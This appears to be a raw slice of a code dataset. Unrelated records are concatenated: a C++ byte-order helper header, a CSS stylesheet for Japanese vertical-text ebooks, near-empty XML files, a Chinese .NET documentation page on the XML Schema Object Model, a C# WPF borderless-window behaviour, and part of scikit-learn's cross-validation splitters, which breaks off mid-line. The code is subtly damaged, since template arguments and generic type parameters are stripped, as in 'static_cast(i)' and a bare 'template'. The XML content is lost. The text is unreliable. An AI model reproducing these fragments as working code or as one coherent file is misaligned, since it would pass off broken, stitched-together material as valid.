constexpr int16_t SWAPSHORT(const int16_t &i)\n{\n\treturn SWAPSHORT(static_cast(i));\n}\n\nstatic constexpr uint32_t SWAPINT(const uint32_t &x)\n{\n#ifdef DXX_HAVE_BUILTIN_BSWAP\n\treturn __builtin_bswap32(x);\n#else\n\treturn (x << 24) | (x >> 24) | ((x & 0xff00) << 8) | ((x >> 8) & 0xff00);\n#endif\n}\n\nstatic constexpr int32_t SWAPINT(const int32_t &i)\n{\n\treturn SWAPINT(static_cast(i));\n}\n\n#if !DXX_WORDS_BIGENDIAN\n#define byteutil_choose_endian(F,a)\t(a)\n#else // ! WORDS_BIGENDIAN\n#define byteutil_choose_endian(F,a)\t(F(a))\n#endif // ! WORDS_BIGENDIAN\nconstexpr std::integral_constant words_bigendian{};\n\n#if DXX_WORDS_NEED_ALIGNMENT\n#define byteutil_unaligned_copy(dt, d, s)\t( DXX_BEGIN_COMPOUND_STATEMENT { dt &destination_reference = d; memcpy(&destination_reference, (s), sizeof(d)); } DXX_END_COMPOUND_STATEMENT )\n#else // WORDS_NEED_ALIGNMENT\n#define byteutil_unaligned_copy(dt, d, s)\t( DXX_BEGIN_COMPOUND_STATEMENT { dt &destination_reference = d; destination_reference = *reinterpret_cast(s); } DXX_END_COMPOUND_STATEMENT )\n#endif // WORDS_NEED_ALIGNMENT\n\nstatic constexpr uint16_t INTEL_SHORT(const uint16_t &x)\n{\n\treturn byteutil_choose_endian(SWAPSHORT, x);\n}\n\nstatic constexpr int16_t INTEL_SHORT(const int16_t &x)\n{\n\treturn byteutil_choose_endian(SWAPSHORT, x);\n}\n\nstatic constexpr uint32_t INTEL_INT(const uint32_t &x)\n{\n\treturn byteutil_choose_endian(SWAPINT, x);\n}\n\nstatic constexpr int32_t INTEL_INT(const int32_t &x)\n{\n\treturn byteutil_choose_endian(SWAPINT, x);\n}\n#undef byteutil_choose_endian\n\ntemplate \nstatic inline uint32_t GET_INTEL_INT(const T *p)\n{\n\tuint32_t u;\n\tbyteutil_unaligned_copy(uint32_t, u, p);\n\treturn INTEL_INT(u);\n}\n\ntemplate \nstatic inline uint16_t GET_INTEL_SHORT(const T *p)\n{\n\tuint16_t u;\n\tbyteutil_unaligned_copy(uint16_t, u, p);\n\treturn INTEL_SHORT(u);\n}\n\ntemplate \nstatic inline void PUT_INTEL_SHORT(uint16_t *d, const T &s)\n{\n\tuint16_t u = INTEL_SHORT(s);\n\tbyteutil_unaligned_copy(uint16_t, *d, &u);\n}\n\ntemplate \nstatic inline void PUT_INTEL_SHORT(uint8_t *d, const T &s)\n{\n\tPUT_INTEL_SHORT(reinterpret_cast(d), s);\n}\n\ntemplate \nstatic inline void PUT_INTEL_INT(uint32_t *d, const T &s)\n{\n\tuint32_t u = INTEL_INT(s);\n\tbyteutil_unaligned_copy(uint32_t, *d, &u);\n}\n\ntemplate \nstatic inline void PUT_INTEL_INT(uint8_t *d, const T &s)\n{\n\tPUT_INTEL_INT(reinterpret_cast(d), s);\n}\n\n#undef byteutil_unaligned_copy\n"} {"text": "@charset \"utf-8\";\n@namespace \"http://www.w3.org/1999/xhtml\";\n\nbody {\n\tfont-family: \"@MS 明朝\", \"@MS Mincho\", \"ヒラギノ明朝 ProN W3\", \"HiraMinProN-W3\", serif, sans-serif;\n\tline-height: <%= line_height %>em !important;\n}\n\n.gtc, .b {\n\tfont-family: '@MS ゴシック','@MS Gothic',sans-serif !important;\n}\n\n.b { font-weight: bold; }\n.i { font-style: italic; }\n\nrt { font-size: 0.6em; }\n\n/* カスタム注記用 */\n\n/* 柱(もどき) */\n.running_head {\n\tposition: absolute !important;\n\ttop: 15px;\n\tleft: 10px;\n\tfont-size: 0.8em;\n}\n\n/* 二分アキ */\n.half_em_space { padding-top: 0.5em; }\n\n/* パラメーター(折り返しあり) */\n.custom_parameter_block {\n\tfont-size: 100%;\n\tline-height: 1.2em !important;\n\tborder: 2px solid #000;\n\tborder-radius: 4px;\n\tmargin: 1em 0.5em 1em 0.5em;\n\tpadding: 1em 0.2em 1em 0.2em;\n\tdisplay: inline-block;\n\tfont-family: sans-serif !important;\n\tfont-weight: bold;\n\tbox-shadow: 3px 3px 3px #bbb;\n\t-webkit-box-shadow: 3px 3px 3px #bbb;\n}\n.jzm .custom_parameter_block {\n\tdisplay: block;\n}\n.jzm .p .custom_parameter_block {\n\tdisplay: inline-block;\n}\n\n/* 前書き */\n.introduction {\n\tfloat: right;\n\tfont-size: 83%;\n\tline-height: 1.5em !important;\n\tborder-top: 3px solid #aaa;\n\tcolor: #555;\n\tmargin: 0.25em;\n\tmargin-right: 1em;\n\tpadding: 1em 0.5em 1em 0.5em;\n\tdisplay: inline-block;\n\tfont-family: sans-serif !important;\n\ttext-align: left !important;\n\theight: 70%;\n}\n.jzm .introduction {\n\tdisplay: block;\n}\n.jzm .p .introduction {\n\tdisplay: inline-block;\n}\n\n/* 後書き */\n.postscript {\n\tfloat: right;\n\tfont-size: 83%;\n\tline-height: 1.5em !important;\n\tborder-top: 3px solid #888;\n\tcolor: #222;\n\tmargin: 0.25em;\n\tmargin-right: 2em;\n\tpadding: 1em 0.5em 1em 0.5em;\n\tdisplay: inline-block;\n\tfont-family: sans-serif !important;\n\ttext-align: left !important;\n\theight: 70%;\n}\n.jzm .postscript {\n\tdisplay: block;\n}\n.jzm .p .postscript {\n\tdisplay: inline-block;\n}\n\ndiv.clear {\n\tclear: both;\n}\n"} {"text": "\n \n \n \n \n \n \n \n \n \n \n \n"} {"text": "---\ntitle: XML 架构对象模型 (SOM)\nms.date: 03/30/2017\nms.technology: dotnet-standard\nms.assetid: a897a599-ffd1-43f9-8807-e58c8a7194cd\nms.openlocfilehash: 1de9fdf9950ba3ae356779ca802afb71f24a345e\nms.sourcegitcommit: 33deec3e814238fb18a49b2a7e89278e27888291\nms.translationtype: HT\nms.contentlocale: zh-CN\nms.lasthandoff: 06/02/2020\nms.locfileid: \"84290313\"\n---\n# XML 架构对象模型 (SOM)\nXML 架构是用于在符合该架构的 XML 文档中创建和验证结构的强大而复杂的工具。 与关系数据库中的数据建模类似,架构提供一种定义 XML 文档结构的方法,这种方法是指定可在文档中使用的元素,同时还要指定这些元素必须遵循的结构和类型,以便这些元素对于该特定架构来说是有效的。 \n \n 架构对象模型 (SOM) 在 命名空间中提供一组类,用于从文件读取架构或通过编程创建内存中架构。 然后,架构可以遍历、编辑、编译、验证或写入文件。 \n \n## 本节内容 \n [XML 架构对象模型概述](xml-schema-object-model-overview.md) \n 描述架构对象模型 (SOM) 以及它提供的功能和类。 \n \n [读取和编写 XML 架构](reading-and-writing-xml-schemas.md) \n 描述如何从文件或其他源读取和写入 XML 架构。 \n \n [生成 XML 架构](building-xml-schemas.md) \n 描述如何使用 命名空间中的类来生成内存中 XML 架构。 \n \n [遍历 XML 架构](traversing-xml-schemas.md) \n 描述如何遍历 XML 架构以访问 SOM 中存储的元素、属性和类型。 \n \n [编辑 XML 架构](editing-xml-schemas.md) \n 描述如何编辑 XML 架构。 \n \n [包含或导入 XML 架构](including-or-importing-xml-schemas.md) \n 描述如何包括或导入其他 XML 架构来补充包括或导入这些架构的架构的结构。\n"} {"text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows;\nusing System.Windows.Controls;\nusing System.Windows.Interactivity;\n\nusing WinInterop = System.Windows.Interop;\nusing System.Runtime.InteropServices;\n\nnamespace OpenUtau.UI.Behaviors\n{\n /// \n /// BorderlessWindowBehavior\n /// Hide default window chrome. Fix maximizing problem. Disable window context menu.\n /// \n class BorderlessWindowBehavior : Behavior\n {\n protected override void OnAttached()\n {\n AddHwndSourceHook();\n base.OnAttached();\n }\n\n void AddHwndSourceHook()\n {\n System.IntPtr handle = (new WinInterop.WindowInteropHelper((Window)AssociatedObject)).EnsureHandle();\n WinInterop.HwndSource.FromHwnd(handle).AddHook(new WinInterop.HwndSourceHook(WindowProc));\n }\n\n private static System.IntPtr WindowProc(\n System.IntPtr hwnd,\n int msg,\n System.IntPtr wParam,\n System.IntPtr lParam,\n ref bool handled)\n {\n switch (msg)\n {\n case 0x0024:/* WM_GETMINMAXINFO */\n WmGetMinMaxInfo(hwnd, lParam);\n handled = true;\n break;\n case 0x0084:/* WM_NCHITTEST */\n if (HitCaptionTest(hwnd, lParam))\n {\n handled = true;\n return (System.IntPtr)2; /*HTCAPTION*/\n }\n break;\n }\n\n return (System.IntPtr)0;\n }\n\n #region Avoid hiding task bar upon maximization\n\n private static void WmGetMinMaxInfo(System.IntPtr hwnd, System.IntPtr lParam)\n {\n\n MINMAXINFO mmi = (MINMAXINFO)Marshal.PtrToStructure(lParam, typeof(MINMAXINFO));\n\n // Adjust the maximized size and position to fit the work area of the correct monitor\n int MONITOR_DEFAULTTONEAREST = 0x00000002;\n System.IntPtr monitor = MonitorFromWindow(hwnd, MONITOR_DEFAULTTONEAREST);\n\n if (monitor != System.IntPtr.Zero)\n {\n\n MONITORINFO monitorInfo = new MONITORINFO();\n GetMonitorInfo(monitor, monitorInfo);\n RECT rcWorkArea = monitorInfo.rcWork;\n RECT rcMonitorArea = monitorInfo.rcMonitor;\n mmi.ptMaxPosition.x = Math.Abs(rcWorkArea.left - rcMonitorArea.left);\n mmi.ptMaxPosition.y = Math.Abs(rcWorkArea.top - rcMonitorArea.top);\n mmi.ptMaxSize.x = Math.Abs(rcWorkArea.right - rcWorkArea.left);\n mmi.ptMaxSize.y = Math.Abs(rcWorkArea.bottom - rcWorkArea.top);\n mmi.ptMinTrackSize.x = 800;\n mmi.ptMinTrackSize.y = 600;\n }\n\n Marshal.StructureToPtr(mmi, lParam, true);\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct POINT\n {\n /// \n /// x coordinate of point.\n /// \n public int x;\n /// \n /// y coordinate of point.\n /// \n public int y;\n\n /// \n /// Construct a point of coordinates (x,y).\n /// \n public POINT(int x, int y)\n {\n this.x = x;\n this.y = y;\n }\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct MINMAXINFO\n {\n public POINT ptReserved;\n public POINT ptMaxSize;\n public POINT ptMaxPosition;\n public POINT ptMinTrackSize;\n public POINT ptMaxTrackSize;\n };\n\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]\n public class MONITORINFO\n {\n public int cbSize = Marshal.SizeOf(typeof(MONITORINFO));\n public RECT rcMonitor = new RECT();\n public RECT rcWork = new RECT();\n public int dwFlags = 0;\n }\n\n [StructLayout(LayoutKind.Sequential, Pack = 0)]\n public struct RECT\n {\n /// Win32 \n public int left;\n /// Win32 \n public int top;\n /// Win32 \n public int right;\n /// Win32 \n public int bottom;\n\n /// Win32 \n public static readonly RECT Empty = new RECT();\n\n /// Win32 \n public int Width\n {\n get { return Math.Abs(right - left); } // Abs needed for BIDI OS\n }\n /// Win32 \n public int Height\n {\n get { return bottom - top; }\n }\n\n /// Win32 \n public RECT(int left, int top, int right, int bottom)\n {\n this.left = left;\n this.top = top;\n this.right = right;\n this.bottom = bottom;\n }\n\n /// Win32 \n public RECT(RECT rcSrc)\n {\n this.left = rcSrc.left;\n this.top = rcSrc.top;\n this.right = rcSrc.right;\n this.bottom = rcSrc.bottom;\n }\n\n /// Win32 \n public bool IsEmpty\n {\n get\n {\n // BUGBUG : On Bidi OS (hebrew arabic) left > right\n return left >= right || top >= bottom;\n }\n }\n /// Return a user friendly representation of this struct \n public override string ToString()\n {\n if (this == RECT.Empty) { return \"RECT {Empty}\"; }\n return \"RECT { left : \" + left + \" / top : \" + top + \" / right : \" + right + \" / bottom : \" + bottom + \" }\";\n }\n\n /// Determine if 2 RECT are equal (deep compare) \n public override bool Equals(object obj)\n {\n if (!(obj is Rect)) { return false; }\n return (this == (RECT)obj);\n }\n\n /// Return the HashCode for this struct (not garanteed to be unique)\n public override int GetHashCode()\n {\n return left.GetHashCode() + top.GetHashCode() + right.GetHashCode() + bottom.GetHashCode();\n }\n\n\n /// Determine if 2 RECT are equal (deep compare)\n public static bool operator ==(RECT rect1, RECT rect2)\n {\n return (rect1.left == rect2.left && rect1.top == rect2.top && rect1.right == rect2.right && rect1.bottom == rect2.bottom);\n }\n\n /// Determine if 2 RECT are different(deep compare)\n public static bool operator !=(RECT rect1, RECT rect2)\n {\n return !(rect1 == rect2);\n }\n }\n\n [DllImport(\"user32\")]\n internal static extern bool GetMonitorInfo(IntPtr hMonitor, MONITORINFO lpmi);\n\n [DllImport(\"user32.dll\")]\n static extern bool GetCursorPos(ref Point lpPoint);\n\n [DllImport(\"User32\")]\n internal static extern IntPtr MonitorFromWindow(IntPtr handle, int flags);\n\n #endregion\n\n #region Hit caption test\n\n private static bool HitCaptionTest(System.IntPtr hwnd, System.IntPtr lParam)\n {\n Window window = (Window)WinInterop.HwndSource.FromHwnd(hwnd).RootVisual;\n int x = lParam.ToInt32() << 16 >> 16, y = lParam.ToInt32() >> 16;\n var point = window.PointFromScreen(new Point(x, y));\n if (point.Y > 24) return false; // Skip VisualTreeHelper.HitTest\n var result = System.Windows.Media.VisualTreeHelper.HitTest(window, point);\n var textblock = result.VisualHit as TextBlock;\n return textblock != null && textblock.Name == \"PART_Titlelabel\";\n }\n\n #endregion\n }\n}\n"} {"text": "\n\n\n \n \n \n \n\n \n \n \n \n\n"} {"text": "\"\"\"\nThe :mod:`sklearn.model_selection._split` module includes classes and\nfunctions to split the data based on a preset strategy.\n\"\"\"\n\n# Author: Alexandre Gramfort ,\n# Gael Varoquaux ,\n# Olivier Grisel \n# Raghav R V \n# License: BSD 3 clause\n\n\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport warnings\nfrom itertools import chain, combinations\nfrom collections import Iterable\nfrom math import ceil, floor\nimport numbers\nfrom abc import ABCMeta, abstractmethod\n\nimport numpy as np\n\nfrom scipy.misc import comb\nfrom ..utils import indexable, check_random_state, safe_indexing\nfrom ..utils.validation import _num_samples, column_or_1d\nfrom ..utils.validation import check_array\nfrom ..utils.multiclass import type_of_target\nfrom ..externals.six import with_metaclass\nfrom ..externals.six.moves import zip\nfrom ..utils.fixes import bincount\nfrom ..utils.fixes import signature\nfrom ..utils.random import choice\nfrom ..base import _pprint\nfrom ..gaussian_process.kernels import Kernel as GPKernel\n\n__all__ = ['BaseCrossValidator',\n 'KFold',\n 'GroupKFold',\n 'LeaveOneGroupOut',\n 'LeaveOneOut',\n 'LeavePGroupsOut',\n 'LeavePOut',\n 'ShuffleSplit',\n 'GroupShuffleSplit',\n 'StratifiedKFold',\n 'StratifiedShuffleSplit',\n 'PredefinedSplit',\n 'train_test_split',\n 'check_cv']\n\n\nclass BaseCrossValidator(with_metaclass(ABCMeta)):\n \"\"\"Base class for all cross-validators\n\n Implementations must define `_iter_test_masks` or `_iter_test_indices`.\n \"\"\"\n\n def __init__(self):\n # We need this for the build_repr to work properly in py2.7\n # see #6304\n pass\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, of length n_samples\n The target variable for supervised learning problems.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n indices = np.arange(_num_samples(X))\n for test_index in self._iter_test_masks(X, y, groups):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield train_index, test_index\n\n # Since subclasses must implement either _iter_test_masks or\n # _iter_test_indices, neither can be abstract.\n def _iter_test_masks(self, X=None, y=None, groups=None):\n \"\"\"Generates boolean masks corresponding to test sets.\n\n By default, delegates to _iter_test_indices(X, y, groups)\n \"\"\"\n for test_index in self._iter_test_indices(X, y, groups):\n test_mask = np.zeros(_num_samples(X), dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, X=None, y=None, groups=None):\n \"\"\"Generates integer indices corresponding to test sets.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\"\"\"\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass LeaveOneOut(BaseCrossValidator):\n \"\"\"Leave-One-Out cross-validator\n\n Provides train/test indices to split data in train/test sets. Each\n sample is used once as a test set (singleton) while the remaining\n samples form the training set.\n\n Note: ``LeaveOneOut()`` is equivalent to ``KFold(n_splits=n)`` and\n ``LeavePOut(p=1)`` where ``n`` is the number of samples.\n\n Due to the high number of test sets (which is the same as the\n number of samples) this cross-validation method can be very costly.\n For large datasets one should favor :class:`KFold`, :class:`ShuffleSplit`\n or :class:`StratifiedKFold`.\n\n Read more in the :ref:`User Guide `.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeaveOneOut\n >>> X = np.array([[1, 2], [3, 4]])\n >>> y = np.array([1, 2])\n >>> loo = LeaveOneOut()\n >>> loo.get_n_splits(X)\n 2\n >>> print(loo)\n LeaveOneOut()\n >>> for train_index, test_index in loo.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... print(X_train, X_test, y_train, y_test)\n TRAIN: [1] TEST: [0]\n [[3 4]] [[1 2]] [2] [1]\n TRAIN: [0] TEST: [1]\n [[1 2]] [[3 4]] [1] [2]\n\n See also\n --------\n LeaveOneGroupOut\n For splitting the data according to explicit, domain-specific\n stratification of the dataset.\n\n GroupKFold: K-fold iterator variant with non-overlapping groups.\n \"\"\"\n\n def _iter_test_indices(self, X, y=None, groups=None):\n return range(_num_samples(X))\n\n def get_n_splits(self, X, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n if X is None:\n raise ValueError(\"The X parameter should not be None\")\n return _num_samples(X)\n\n\nclass LeavePOut(BaseCrossValidator):\n \"\"\"Leave-P-Out cross-validator\n\n Provides train/test indices to split data in train/test sets. This results\n in testing on all distinct samples of size p, while the remaining n - p\n samples form the training set in each iteration.\n\n Note: ``LeavePOut(p)`` is NOT equivalent to\n ``KFold(n_splits=n_samples // p)`` which creates non-overlapping test sets.\n\n Due to the high number of iterations which grows combinatorically with the\n number of samples this cross-validation method can be very costly. For\n large datasets one should favor :class:`KFold`, :class:`StratifiedKFold`\n or :class:`ShuffleSplit`.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n p : int\n Size of the test sets.\n\n Examples\n --------\n >>> from sklearn.model_selection import LeavePOut\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 3, 4])\n >>> lpo = LeavePOut(2)\n >>> lpo.get_n_splits(X)\n 6\n >>> print(lpo)\n LeavePOut(p=2)\n >>> for train_index, test_index in lpo.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [2 3] TEST: [0 1]\n TRAIN: [1 3] TEST: [0 2]\n TRAIN: [1 2] TEST: [0 3]\n TRAIN: [0 3] TEST: [1 2]\n TRAIN: [0 2] TEST: [1 3]\n TRAIN: [0 1] TEST: [2 3]\n \"\"\"\n\n def __init__(self, p):\n self.p = p\n\n def _iter_test_indices(self, X, y=None, groups=None):\n for combination in combinations(range(_num_samples(X)), self.p):\n yield np.array(combination)\n\n def get_n_splits(self, X, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n \"\"\"\n if X is None:\n raise ValueError(\"The X parameter should not be None\")\n return int(comb(_num_samples(X), self.p, exact=True))\n\n\nclass _BaseKFold(with_metaclass(ABCMeta, BaseCrossValidator)):\n \"\"\"Base class for KFold, GroupKFold, and StratifiedKFold\"\"\"\n\n @abstractmethod\n def __init__(self, n_splits, shuffle, random_state):\n if not isinstance(n_splits, numbers.Integral):\n raise ValueError('The number of folds must be of Integral type. '\n '%s of type %s was passed.'\n % (n_splits, type(n_splits)))\n n_splits = int(n_splits)\n\n if n_splits <= 1:\n raise ValueError(\n \"k-fold cross-validation requires at least one\"\n \" train/test split by setting n_splits=2 or more,\"\n \" got n_splits={0}.\".format(n_splits))\n\n if not isinstance(shuffle, bool):\n raise TypeError(\"shuffle must be True or False;\"\n \" got {0}\".format(shuffle))\n\n self.n_splits = n_splits\n self.shuffle = shuffle\n self.random_state = random_state\n\n def split(self, X, y=None, groups=None):\n \"\"\"Generate indices to split data into training and test set.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n y : array-like, shape (n_samples,)\n The target variable for supervised learning problems.\n\n groups : array-like, with shape (n_samples,), optional\n Group labels for the samples used while splitting the dataset into\n train/test set.\n\n Returns\n -------\n train : ndarray\n The training set indices for that split.\n\n test : ndarray\n The testing set indices for that split.\n \"\"\"\n X, y, groups = indexable(X, y, groups)\n n_samples = _num_samples(X)\n if self.n_splits > n_samples:\n raise ValueError(\n (\"Cannot have number of splits n_splits={0} greater\"\n \" than the number of samples: {1}.\").format(self.n_splits,\n n_samples))\n\n for train, test in super(_BaseKFold, self).split(X, y, groups):\n yield train, test\n\n def get_n_splits(self, X=None, y=None, groups=None):\n \"\"\"Returns the number of splitting iterations in the cross-validator\n\n Parameters\n ----------\n X : object\n Always ignored, exists for compatibility.\n\n y : object\n Always ignored, exists for compatibility.\n\n groups : object\n Always ignored, exists for compatibility.\n\n Returns\n -------\n n_splits : int\n Returns the number of splitting iterations in the cross-validator.\n \"\"\"\n return self.n_splits\n\n\nclass KFold(_BaseKFold):\n \"\"\"K-Folds cross-validator\n\n Provides train/test indices to split data in train/test sets. Split\n dataset into k consecutive folds (without shuffling by default).\n\n Each fold is then used once as a validation while the k - 1 remaining\n folds form the training set.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of folds. Must be at least 2.\n\n shuffle : boolean, optional\n Whether to shuffle the data before splitting into batches.\n\n random_state : None, int or RandomState\n When shuffle=True, pseudo-random number generator state used for\n shuffling. If None, use default numpy RNG for shuffling.\n\n Examples\n --------\n >>> from sklearn.model_selection import KFold\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([1, 2, 3, 4])\n >>> kf = KFold(n_splits=2)\n >>> kf.get_n_splits(X)\n 2\n >>> print(kf) # doctest: +NORMALIZE_WHITESPACE\n KFold(n_splits=2, random_state=None, shuffle=False)\n >>> for train_index, test_index in kf.split(X):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [2 3] TEST: [0 1]\n TRAIN: [0 1] TEST: [2 3]\n\n Notes\n -----\n The first ``n_samples % n_splits`` folds have size\n ``n_samples // n_splits + 1``, other folds have size\n ``n_samples // n_splits``, where ``n_samples`` is the number of samples.\n\n See also\n --------\n StratifiedKFold\n Takes group information into account to avoid building folds with\n imbalanced class distributions (for binary or multiclass\n classification tasks).\n\n GroupKFold: K-fold iterator variant with non-overlapping groups.\n \"\"\"\n\n def __init__(self, n_splits=3, shuffle=False,\n random_state=None):\n super(KFold, self).__init__(n_splits, shuffle, random_state)\n\n def _iter_test_indices(self, X, y=None, groups=None):\n n_samples = _num_samples(X)\n indices = np.arange(n_samples)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n\n n_splits = self.n_splits\n fold_sizes = (n_samples // n_splits) * np.ones(n_splits, dtype=np.int)\n fold_sizes[:n_samples % n_splits] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass GroupKFold(_BaseKFold):\n \"\"\"K-fold iterator variant with non-overlapping groups.\n\n The same group will not appear in two different folds (the number of\n distinct groups has to be at least equal to the number of folds).\n\n The folds are approximately balanced in the sense that the number of\n distinct groups is approximately the same in each fold.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of folds. Must be at least 2.\n\n Examples\n --------\n >>> from sklearn.model_selection import GroupKFold\n >>> X = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])\n >>> y = np.array([1, 2, 3, 4])\n >>> groups = np.array([0, 0, 2, 2])\n >>> group_kfold = GroupKFold(n_splits=2)\n >>> group_kfold.get_n_splits(X, y, groups)\n 2\n >>> print(group_kfold)\n GroupKFold(n_splits=2)\n >>> for train_index, test_index in group_kfold.split(X, y, groups):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n ... print(X_train, X_test, y_train, y_test)\n ...\n TRAIN: [0 1] TEST: [2 3]\n [[1 2]\n [3 4]] [[5 6]\n [7 8]] [1 2] [3 4]\n TRAIN: [2 3] TEST: [0 1]\n [[5 6]\n [7 8]] [[1 2]\n [3 4]] [3 4] [1 2]\n\n See also\n --------\n LeaveOneGroupOut\n For splitting the data according to explicit domain-specific\n stratification of the dataset.\n \"\"\"\n def __init__(self, n_splits=3):\n super(GroupKFold, self).__init__(n_splits, shuffle=False,\n random_state=None)\n\n def _iter_test_indices(self, X, y, groups):\n if groups is None:\n raise ValueError(\"The groups parameter should not be None\")\n groups = check_array(groups, ensure_2d=False, dtype=None)\n\n unique_groups, groups = np.unique(groups, return_inverse=True)\n n_groups = len(unique_groups)\n\n if self.n_splits > n_groups:\n raise ValueError(\"Cannot have number of splits n_splits=%d greater\"\n \" than the number of groups: %d.\"\n % (self.n_splits, n_groups))\n\n # Weight groups by their number of occurrences\n n_samples_per_group = np.bincount(groups)\n\n # Distribute the most frequent groups first\n indices = np.argsort(n_samples_per_group)[::-1]\n n_samples_per_group = n_samples_per_group[indices]\n\n # Total weight of each fold\n n_samples_per_fold = np.zeros(self.n_splits)\n\n # Mapping from group index to fold index\n group_to_fold = np.zeros(len(unique_groups))\n\n # Distribute samples by adding the largest weight to the lightest fold\n for group_index, weight in enumerate(n_samples_per_group):\n lightest_fold = np.argmin(n_samples_per_fold)\n n_samples_per_fold[lightest_fold] += weight\n group_to_fold[indices[group_index]] = lightest_fold\n\n indices = group_to_fold[groups]\n\n for f in range(self.n_splits):\n yield np.where(indices == f)[0]\n\n\nclass StratifiedKFold(_BaseKFold):\n \"\"\"Stratified K-Folds cross-validator\n\n Provides train/test indices to split data in train/test sets.\n\n This cross-validation object is a variation of KFold that returns\n stratified folds. The folds are made by preserving the percentage of\n samples for each class.\n\n Read more in the :ref:`User Guide `.\n\n Parameters\n ----------\n n_splits : int, default=3\n Number of folds. Must be at least 2.\n\n shuffle : boolean, optional\n Whether to shuffle each stratification of the data before splitting\n into batches.\n\n random_state : None, int or RandomState\n When shuffle=True, pseudo-random number generator state used for\n shuffling. If None, use default numpy RNG for shuffling.\n\n Examples\n --------\n >>> from sklearn.model_selection import StratifiedKFold\n >>> X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\n >>> y = np.array([0, 0, 1, 1])\n >>> skf = StratifiedKFold(n_splits=2)\n >>> skf.get_n_splits(X, y)\n 2\n >>> print(skf) # doctest: +NORMALIZE_WHITESPACE\n StratifiedKFold(n_splits=2, random_state=None, shuffle=False)\n >>> for train_index, test_index in skf.split(X, y):\n ... print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n ... X_train, X_test = X[train_index], X[test_index]\n ... y_train, y_test = y[train_index], y[test_index]\n TRAIN: [1 3] TEST: [0 2]\n TRAIN: [0 2] TEST: [1 3]\n\n Notes\n -----\n All the folds have size ``trunc(n_samples / n_splits)``, the last one has\n the complementary.\n\n \"\"\"\n\n def __init__(self, n_splits=3, shuffle=False, random_state=None):\n super(StratifiedKFold, self).__init__(n_splits, shuffle, random_state)\n\n def _make_test_folds(self, X, y=None, groups=None):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = np.asarray(y)\n n_samples = y.shape[0]\n unique_y, y_inversed = np.unique(y, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_groups = np.min(y_counts)\n if np.all(self.n_splits > y_counts):\n raise ValueError(\"All the n_groups for individual classes\"\n \" are less than n_splits=%d.\"\n % (self.n_splits))\n if self.n_splits > min_groups:\n warnings.warn((\"The least populated class in y has only %d\"\n \" members, which is too few. The minimum\"\n \" number of groups for any class cannot\"\n \" be less than n_splits=%d.\"\n % (min_groups, self.n_splits)), Warning)\n\n # pre-assign each sample to a test fold index using individual KFold\n # splitting strategies for each class so as to respect the balance of\n # classes\n # NOTE: Passing the data corresponding to ith class say X[y==class_i]\n # will break when the data is not 100% stratifiable for all classes.\n # So we pass np.zeroes(max(c, n_splits)) as data to the KFold\n per_cls_cvs = [\n KFold(self.n_splits, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_splits)))\n for count in y_counts]\n\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[y == 